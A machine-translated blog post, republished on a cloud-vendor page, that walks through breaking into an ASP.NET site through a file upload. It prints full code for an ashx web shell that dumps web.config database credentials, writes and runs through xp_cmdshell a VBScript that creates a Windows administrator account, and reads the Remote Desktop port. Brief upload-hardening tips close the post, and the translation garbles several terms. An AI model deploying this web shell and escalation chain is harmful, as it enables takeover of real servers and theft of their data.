ASP. NET Website intrusion Second Wave (LeaRun. The rapid development framework of information technology has been won by the author), asp. netlearun

Source: Internet
Author: User

ASP. NET Website intrusion Second Wave (LeaRun. The rapid development framework of information technology has been won by the author), asp. netlearun

In my primary school culture, I have poor language organizational skills. If you cannot write anything, you can check it out.

In the previous article, I talked about how to intrude into the server by uploading files. This time we will talk a little more about it.

Let's talk about the process first:

1. upload code page I uploaded the ashx page.

2. Use the text on the ashx page to display the web. Config content to get the database connection,

3. Use ashx to output the vbs script in the root directory of the website (create a Windows Account script)

4. Enable xp_mongoshell for the database.

5. Use the database to output the vbs script in the root directory of the website. Intrusion is complete.

The ashx code file is as follows:

/// <Summary> // display the configuration file /// </summary> /// <param name = "context"> </param> public void ShowWebConfig (HttpContext context) {context. response. write (System. IO. file. readAllText (context. request. mapPath ("~ /Web. config ")));} /// <summary> /// write the vbs script /// </summary> /// <param name = "context"> </param> public void WriteVbs (HttpContext context) {System. IO. file. writeAllText (context. request. mapPath ("~ /1.vbs"), "set wsnetwork = CreateObject (\" WSCRIPT. NETWORK \ ") \ r \ nos = \" WinNT: // \ "& wsnetwork. computerName \ r \ nSet ob = GetObject (OS) 'to obtain the adsi interface, bind the \ r \ nSet oe = GetObject (OS & \ "/Administrators, group \")' attribute, admin group \ r \ nSet od = ob. create (\ "user \", \ "test \") 'creates a user \ r \ nod. setPassword \ "1234 \" 'Set Password \ r \ nod. setInfo 'Save \ r \ nSet of = GetObject (OS & \ "/test \", user) 'To get user \ r \ noe. add OS & \ "/freeast \" \ r \ n ") ;}/// <summary> // linear database/ /// </Summary> /// <param name = "connection"> </param> /// <param name = "SQL"> </param> public void ExecuteSql (string connection, string SQL) {using (SqlConnection con = new SqlConnection (connection) {using (SqlCommand commd = new SqlCommand (SQL, con) {con. open (); commd. executeNonQuery (); con. close ();}}} /// <summary> /// line database and output table /// </summary> /// <param name = "context"> </param> /// <param n Ame = "connection"> </param> // <param name = "SQL"> </param> public void ExecuteSql1 (HttpContext context, string connection, string SQL) {System. data. dataTable table = new System. data. dataTable (); using (SqlConnection con = new SqlConnection (connection) {using (SqlCommand commd = new SqlCommand (SQL, con) {con. open (); using (SqlDataAdapter ad = new SqlDataAdapter (commd) {ad. fill (table);} con. clo Se () ;}} foreach (System. data. dataRow row in table. rows) {foreach (System. data. dataColumn column in table. columns) {context. response. write (row [column]); context. response. write ("\ t");} context. response. write ("\ r \ n ");}} /// <summary> /// display the Remote Desktop port /// </summary> /// <param name = "context"> </param> private void ShowPort (HttpContext context) {context. response. write (Microsoft. win32.Registry. localM Achine. openSubKey (@ "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp "). getValue ("PortNumber "). toString ();} public void ProcessRequest (HttpContext context) {context. response. contentType = "text/plain"; try {var connection = context. request. queryString ["connection"]; switch (context. request. queryString ["method"]) {case "1": WriteVbs (context); break; case "2": ExecuteSql (connec Tion, @ "sp_configure 'show advanced options', 1 reconfigure"); ExecuteSql (connection, @ "sp_configure 'xp _ javasshell', 1 reconfigure "); // enable xp_mongoshell break; case "3": ExecuteSql1 (context, connection, "exec master .. xp_cmdshell 'cscript "+ context. request. mapPath ("~ /1.vbs") + "'"); break; case "4": ShowPort (context); break; default: ShowWebConfig (context); break;} catch (Exception ex) {context. response. write (ex. message);} context. response. end () ;}public bool IsReusable {get {return false ;}}View Code

 

Here we take the online button "LeaRun. Rapid informatization development framework" as an example.

I won't talk about uploading files. Someone asked me how to display the content of web. Config in the previous article. I am posting the code here, which is actually very simple. The File. ReadAllText web. config File is enough.

public void ShowWebConfig(HttpContext context)        {            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));        }

After running the command, ashx returns the database connection,

 

The second is the script for creating a Windows account.

Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ") OS =" WinNT: // "& wsnetwork. computerNameSet ob = GetObject (OS) 'to obtain the adsi interface, bind the Set oe = GetObject (OS & "/Administrators, group")' attribute, and Set od = ob in the admin group. create ("user", "test") 'creates a user od. setPassword "1234" 'sets the password od. setInfo 'Save Set of = GetObject (OS & "/test", user) 'To get user oe. add OS & "/freeast"View Code

 

Then open the xp_mongoshell of the database.

sp_configure 'show advanced options',1  reconfigureGosp_configure 'xp_cmdshell',1 reconfigure


Run the vbs script at the end.

Exec master .. xp_mongoshell 'cscript script file directory "'

The running result is as follows:


Okay. This indicates that the straight line is successful .... That is, the server user is successfully added.

 

Now we have to start remote desktop, so a port scanning tool found that 3389 is off, so it was determined that it was a modified port, so we added a code to allow the program to read the Remote Desktop port,

The Code is as follows:

/// <Summary> /// display the Remote Desktop port /// </summary> /// <param name = "context"> </param> private void ShowPort (HttpContext context) {context. response. write (Microsoft. win32.Registry. localMachine. openSubKey (@ "SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp "). getValue ("PortNumber "). toString ());}


Now everything is done. Open the Remote Desktop Connection ..

 

This is because the event owner has not been notified yet, so I helped the victim fix the vulnerability and sent it out. So you should not try it either -.-!!!!

Then I will talk about the remedy. I will briefly introduce several methods.

1. Put the uploaded file out of the website, that is to say, the iit cannot be read (but remember to assign permissions). For example, if my website is placed on d: \ Web \ Oa \ This is the directory of my website, so the files I uploaded can be placed in d: \ File \ OA, and others cannot access them directly.

2. Create a new web. config in the directory of the uploaded file to reject all requests. (C # can be read, but Response. WriteFile must be used for output)

3. All Compression

................

 

Now, let's sort out the previous projects and make up the projects that can be supplemented .... Never use these vulnerabilities to do bad things ,... Then you will be invited to tea .... -.-!!!!!

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.